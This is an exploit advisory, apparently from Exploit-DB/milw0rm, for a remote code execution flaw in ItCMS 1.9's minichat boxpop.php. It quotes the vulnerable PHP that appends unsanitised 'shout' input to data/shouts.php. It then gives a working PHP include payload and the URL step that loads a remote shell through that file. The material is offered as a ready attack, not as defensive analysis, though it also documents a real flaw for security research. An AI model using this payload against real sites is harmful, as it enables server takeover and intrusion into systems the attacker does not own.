ItCMS 1.9 - 'boxpop.php' Remote Code Execution

EDB-ID:

5532


Author:

Cod3rZ

Type:

webapps


Platform:

PHP

Date:

2008-05-02


#===========================================================================================================================#
#                                     _ ____             _        _ _                _                                      #
#                          __ ___  __| |__ /_ _ ___     | |_  ___| | |_____ __ _____| |__       ___ _  _                    #
#                         / _/ _ \/ _` ||_ \ '_|_ /  _  | ' \/ -_) | / _ \ V  V / -_) '_ \  _  / -_) || |                   #
#                         \__\___/\__,_|___/_| /__| (_) |_||_\___|_|_\___/\_/\_/\___|_.__/ (_) \___|\_,_|                   #
#===========================================================================================================================#
#                                              ItCMS 1.9 Remote File Rewriting                                              #
#===========================================================================================================================#
#                                                      Author : Cod3rZ                                                      #
#===========================================================================================================================#
#                                              Site : http://cod3rz.helloweb.eu                                             #
#                                          Site : http://devilsnight.altervista.org                                         #
#===========================================================================================================================#
# Remote File Rewriting:                                                                                                    #
#===========================================================================================================================#
# /box/minichat/boxpop.php                                                                                                  #
#===========================================================================================================================#
# if ($_POST["shout"]!=""){                                                                                                 #
# $shout = $_POST['shout'];                                                                                           	    #
# } else if ($_GET["shout"]!=""){                                                                                           #
# $shout = $_GET["shout"];                                                                                            	    #
# }                                                                                                                         #
# [...]                                                                                                                     #
# $shout = trim($shout);                                                                                                    #
# $shout = stripslashes($shout);                                                                                            #
# $shout = str_replace ("\r\n", " [br] ", $shout);                                                                          #
# $shout = first($shout);                                                                                                   #
# [...]                                                                                                                     #
# $FileName="data/shouts.php";                                                                                              #
# if($FilePointer=fopen($FileName, "a+")){                                                                                  #
# fwrite($FilePointer,"$name|^|$shout|^|$date|^|$time|^|$_SERVER[REMOTE_ADDR]|^|\n");                                       #
# fclose($FilePointer);                                                                                                     #
#===========================================================================================================================#
# So, we can write a malicious code like <?php include($_GET['rfi']); ?> in the variable $shout,                            #
# and then we go in data/shouts.php?rfi=[shell]                                                                             #
#===========================================================================================================================#
# There are many other bugs, find it yourself                                                                               #
#===========================================================================================================================#
# Devils Night Corporation - http://devilsnight.altervista.org                                                              #
#===========================================================================================================================#

# milw0rm.com [2008-05-02]